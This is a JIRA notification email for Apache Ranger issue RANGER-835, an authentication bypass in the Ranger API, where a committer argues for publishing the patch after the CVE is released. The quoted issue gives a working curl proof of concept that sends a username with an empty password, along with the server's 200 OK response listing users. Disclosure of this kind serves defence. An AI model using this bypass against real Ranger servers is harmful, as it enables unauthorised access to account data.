[jira] [Commented] (RANGER-835) Authentication bypass in Ranger API

Tue, 09 Feb 2016 15:35:58 -0800 

    [ 
https://issues.apache.org/jira/browse/RANGER-835?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15140004#comment-15140004
 ] 

Dilli Dorai Minnal Arumugam commented on RANGER-835:
----------------------------------------------------

Thanks [~bosco] for the links.

Reviewed http://www.apache.org/security/committers.html
Reading the following snippet in that page

"The log for the svn commit that applied the fix is updated to include the CVE 
number. Projects that use git as their primary source code control system 
should not do this as editing a pushed commit causes all sorts of problems."

indicates the patch need not be hidden after CVE is released.

In fact it encourages updating the commit message with CVE number and cautions 
us not to do that for git repositories because git gets confused.

Considering that, I think it would be appropriate to include the commit id and 
the patch here to allow community (PPMCs, committers, contributors and users)  
to review the patch.



> Authentication bypass in Ranger API
> -----------------------------------
>
>                 Key: RANGER-835
>                 URL: https://issues.apache.org/jira/browse/RANGER-835
>             Project: Ranger
>          Issue Type: Bug
>          Components: Ranger
>    Affects Versions: 0.5.0
>            Reporter: Jim Halfpenny
>            Priority: Critical
>              Labels: authentication, security, vulnerability
>             Fix For: 0.5.1, 0.6.0
>
>
> Authentication to the Ranger API can be trivially bypassed by sending a valid 
> username along with a null password. API authentication appears to work 
> correctly, rejecting requests if the password is incorrect but allows 
> requests where no password has been sent.
> The example below uses curl to demonstrate this issue by retrieving a list of 
> the users.
> $ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
> *   Trying 127.0.0.1...
> * Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
> * Server auth using Basic with user 'admin'
> > HEAD /service/xusers/users HTTP/1.1
> > Host: 127.0.0.1:6080
> > Authorization: Basic YWRtaW46
> > User-Agent: curl/7.43.0
> > Accept: */*
> > 
> < HTTP/1.1 200 OK
> < Server: Apache-Coyote/1.1
> < Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
> < Content-Type: application/xml
> < Content-Length: 0
> < Date: Fri, 05 Feb 2016 11:41:16 GMT
> < 
> <?xml version="1.0" encoding="UTF-8" 
> standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

Reply via email to